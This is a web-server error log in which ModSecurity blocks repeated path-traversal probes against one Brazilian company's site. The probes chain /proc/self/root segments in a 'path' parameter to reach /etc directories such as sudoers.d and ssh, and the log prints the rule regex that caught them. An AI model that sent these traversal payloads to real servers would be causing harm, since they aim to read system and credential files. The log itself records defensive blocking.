[Tue Mar 17 08:58:11.661438 2026] [:error] [pid 2325:tid 140411607643904] [client 74.7.243.203:50196] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB0-82sZHvlq4xgHq-_wAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:13.004211 2026] [:error] [pid 7000:tid 140411716749056] [client 74.7.243.203:50198] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB1RePVOt35XCGZP8rkAAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:13.346371 2026] [:error] [pid 1961:tid 140411733534464] [client 74.7.244.31:51090] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablB1XRXaaWotPICgYsgdwAAA0E"]
[Tue Mar 17 08:58:14.144698 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.243.203:50202] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB1qBJNF7axNlVR0X4igAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:15.287222 2026] [:error] [pid 11469:tid 140411649607424] [client 74.7.243.203:50214] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB15DEJR9VXonE_-1JfQAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:15.943202 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.241.46:49366] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB1weiSKl8TjouI-b9qgAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:58:16.580447 2026] [:error] [pid 2305:tid 140411599251200] [client 74.7.243.203:50228] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB2AQohV2v-7oj5HH2mgAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:17.856792 2026] [:error] [pid 1016:tid 140411733534464] [client 74.7.243.203:50242] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB2ZqmL8PQht4WJFlCpQAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:19.174054 2026] [:error] [pid 2305:tid 140411683178240] [client 74.7.243.203:50254] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB2wQohV2v-7oj5HH2mwAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:21.758670 2026] [:error] [pid 11469:tid 140411574073088] [client 74.7.243.203:43690] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB3ZDEJR9VXonE_-1JfwAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:23.072170 2026] [:error] [pid 1961:tid 140411699963648] [client 74.7.243.203:43692] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB33RXaaWotPICgYsgeQAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:24.307918 2026] [:error] [pid 11469:tid 140411548894976] [client 74.7.243.203:43708] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB4JDEJR9VXonE_-1JgwAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:26.513107 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.243.203:43718] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB4aBJNF7axNlVR0X4jQAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:27.816284 2026] [:error] [pid 1016:tid 140411632822016] [client 74.7.243.203:43734] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB45qmL8PQht4WJFlCrwAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:58:29.093949 2026] [:error] [pid 1016:tid 140411658000128] [client 74.7.243.203:43736] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB5ZqmL8PQht4WJFlCsQAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:58:31.083417 2026] [:error] [pid 1016:tid 140411574073088] [client 74.7.241.46:54148] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB55qmL8PQht4WJFlCtgAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:58:33.488649 2026] [:error] [pid 2325:tid 140411616036608] [client 74.7.241.46:46762] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB6e82sZHvlq4xgHq_BQAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:58:34.847305 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.241.46:46776] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB6qBJNF7axNlVR0X4jwAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:58:46.148781 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.241.46:46792] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB9qBJNF7axNlVR0X4nAAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:58:48.639984 2026] [:error] [pid 1961:tid 140411741927168] [client 74.7.241.46:38972] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB-HRXaaWotPICgYsgggAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:58:51.020020 2026] [:error] [pid 2325:tid 140411641214720] [client 74.7.241.46:42036] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB--82sZHvlq4xgHq_DQAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:58:52.314708 2026] [:error] [pid 1210:tid 140411699963648] [client 74.7.241.46:42044] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablB_FKJy4A1bGlmj9BQ1QAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
